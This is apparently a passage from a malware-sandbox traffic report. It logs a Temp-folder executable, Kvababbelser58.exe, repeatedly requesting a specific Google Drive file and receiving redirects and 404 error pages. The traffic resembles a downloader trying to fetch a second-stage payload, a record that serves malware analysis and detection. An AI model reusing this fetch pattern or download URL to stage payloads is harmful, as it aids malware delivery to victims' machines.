                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:01 GMT
                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-nsG67Q5cynzGTl6ANojSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Set-Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE; expires=Sat, 12-Jul-2025 23:50:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 59 49 42 51 4c 73 78 32 75 4a 34 42 53 6d 65 70 72 7a 4b 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9YIBQLsx2uJ4BSmeprzK4g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749971216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:02 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:02 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:02 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-IJZWlmDdYewOtGxtT8-ckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749972142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:03 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:04 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgR3OmXTgs2fyZL9Lrw4lucHPc-7cCcpEJ9vaLjGWbn_LikgV1KaM0y3MIMG224fWC_5
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:04 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Sl9nh-YO6cDK7CcQgST5tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 6a 5f 79 77 52 30 68 65 47 61 58 5a 74 4f 31 61 74 46 4e 47 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vj_ywR0heGaXZtO1atFNGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.749973216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:04 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:05 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:05 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-fKgR-trA6eMm8tQ15FyMpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.749974142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:06 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:06 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQJmEdCyP-Hmuwz9hJ9gDloHXupxA_CDRV6E_koZTRez1bxH5ANe-61AXhf0JTtbxD-
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:06 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-gKiuzzxo1j_3g4MQHGKj_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 6a 73 5f 64 6e 79 6a 38 66 43 6d 66 42 51 5f 6d 48 47 41 4a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sjs_dnyj8fCmfBQ_mHGAJw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749975216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:07 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:07 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:07 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-vNbrRvXpJkB8p387xgqR_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.749976142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:08 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:08 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQY1gtx9tUvyQr-YalIe5dy154ewzwGJRyLWpNNpak5OgELrjLos4bD0-xxBxFHbGyTrFflm4w
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:08 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-yYX3teXftvJUH-6jD18A1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4b 4b 7a 42 74 4b 4a 53 70 46 61 74 54 2d 4a 69 30 30 2d 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jKKzBtKJSpFatT-Ji00-tw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.749977216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:09 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
